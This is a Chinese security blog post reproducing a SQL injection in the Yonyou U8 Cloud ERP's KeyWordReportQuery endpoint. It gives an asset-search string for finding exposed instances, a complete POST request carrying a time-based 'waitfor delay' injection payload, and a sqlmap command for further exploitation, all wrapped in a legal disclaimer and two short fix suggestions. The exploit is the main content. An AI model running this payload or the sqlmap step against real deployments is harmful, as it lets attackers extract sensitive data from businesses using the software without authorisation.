漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

admin 2024年3月5日11:27:37评论18 views字数 1014阅读3分22秒阅读模式

点击

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

告诉TA吧

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

文章声明  

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。本文所提供的工具仅用于学习,禁止用于其他目的,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。

产品介绍

0
1

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

用友U8 cloud聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

漏洞介绍

用友U8 Cloud KeyWordDetailReportQuery接口处存在SQL漏洞,攻击者可通过该漏洞获取数据库中的敏感信息。

漏洞编号:暂无

漏洞类型:SQL注入

影响版本:暂不确定

资产测绘

0
2

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

body="开启U8 cloud云端之旅"

漏洞复现

0
3

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

请在授权环境下测试

利用POC进行检测,出现延迟则存在漏洞;

POST /service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery HTTP/1.1Host: 目标IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Type: application/x-www-form-urlencoded{"reportType":"1';waitfor delay '0:0:5'-- ","pageInfo":{"currentPageIndex":1,"pageSize":1},"keyword":[]}

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

0
4

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

使用sqlmap神器一把嗦,进一步利用(请在合法授权情况下操作

python sqlmap.py -r POST.txtrandom-agentlevel 3 -v 3

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

修复建议

存在该资产企业尽快排查并及时进行修复,修复建议如下:

1.及时关注官网进行更新;

2.安全防护设备限制相关路径访问;

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

关注我们

漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

点它,分享点赞在看都在这里

原文始发于微信公众号(Guoxin 401):漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月5日11:27:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现|用友U8 Cloud KeyWordReportQuery SQL注入http://cn-sec.com/archives/2545360.html

发表评论

匿名网友 填写信息